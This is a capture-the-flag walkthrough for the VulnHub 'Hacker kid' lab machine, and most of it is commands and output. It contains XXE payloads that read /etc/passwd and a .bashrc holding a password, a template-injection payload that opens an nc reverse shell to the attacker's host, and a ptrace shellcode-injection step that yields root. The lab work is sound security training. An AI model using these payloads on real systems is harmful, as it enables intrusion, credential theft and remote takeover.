VlunHub Hacker kid: 1.0.1 Walkthrough
https://www.vulnhub.com/entry/hacker-kid-101,719/
Very good machine, learn some new stuff.
Scan ports, port 53 is interesting.
nmap -sV -sC -p- 192.168.33.144 -oN ports.log
...
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Notorious Kid : A Hacker
9999/tcp open http Tornado httpd 6.1
|_http-server-header: TornadoServer/6.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scan port 80.
/images (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
/index.php (Status: 200) [Size: 3597]
/css (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]
/form.html (Status: 200) [Size: 10219]
/app.html (Status: 200) [Size: 8048]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]
Found hints in index.php source code.
```bash
<div class="container py-5">
<h1>Thanks</h1>
TO DO: Use a GET parameter page_no to view pages.
--></code></pre>
<p>Fuzz index.php with page_no.</p>
<pre><code class="language-bash"> ~ seq 1 100 > dic.txt
~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ' -w dic.txt --hh 3654
...
=====================================================================
000000021: 200 116 L 310 W 3849 Ch "21"</code></pre>
<p>Get more info with page_no=21.</p>
<pre><code class="language-bash"> ~ curl 'http://192.168.33.144/index.php?page_no=21'
<center>
<font color="red">
Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
<font color="red">
</center></code></pre>
<p>Dig another domain name, write it into /etc/hosts.</p>
<pre><code class="language-bash">~ dig @192.168.33.144 hackers.blackhat.local ...
;; AUTHORITY SECTION:
blackhat.local. 3600 IN SOA blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
...</code></pre>
<p>Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.</p>
<p>```bash
~ curl '<a href="http://hackerkid.blackhat.local/process.php'">http://hackerkid.blackhat.local/process.php'</a>; -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
bind:x:126:133::/var/cache/bind:/usr/sbin/nologin</p>
<pre><code>
Read bachrc file with base64.
```bash
~ curl 'http://hackerkid.blackhat.local/process.php' -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!</code></pre>
<p>Decode base64. Get password of port 9999, but should login with name "saket".</p>
<pre><code class="language-bash"> #Setting Password for running python app
username="admin"
password="Saket!#$%@!!"</code></pre>
<p>Login port 9999.</p>
<p>image-20210906141418214.png</p>
<p>Input param "name", get output in webpage.</p>
<p>image-20210906141454486.png</p>
<p>Enter shell code, get reverse shell through nc, then spawn a new full shell.</p>
<p>```bash
{%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}</p>
<pre><code>
Getcap enum.
```bash
saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
/sbin/getcap / -r 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
...</code></pre>
<blockquote>
<p>Reference: <a href="https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc">https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc</a></p>
</blockquote>
<p>Download the POC and upload to server.</p>
<pre><code class="language-bash"> wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py</code></pre>
<p>Choose a root process to be injected.</p>
<pre><code class="language-bash"> saket@ubuntu:~$ ps aux|grep root
...
root 935 0.0 0.4 199776 19968 ? Ss 12:54 0:00 /usr/sbin/apache2 -k start
...</code></pre>
<p>Run the POC, then check port.</p>
<p>```bash
saket@ubuntu:~$ python2.7 inject.py 935
python2.7 inject.py 935
Instruction Pointer: 0x7fd118b560daL
Injecting Shellcode at: 0x7fd118b560daL
Shellcode Injected!!
Final Instruction Pointer: 0x7fd118b560dcL
saket@ubuntu:~$ ss -tnlp
ss -tnlp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process ...
LISTEN 0 0 0.0.0.0:5600 0.0.0.0:* ...</p>
<pre><code>
Connect port 5600 and get root shell.
```bash
~ nc 192.168.33.144 5600
id
uid=0(root) gid=0(root) groups=0(root)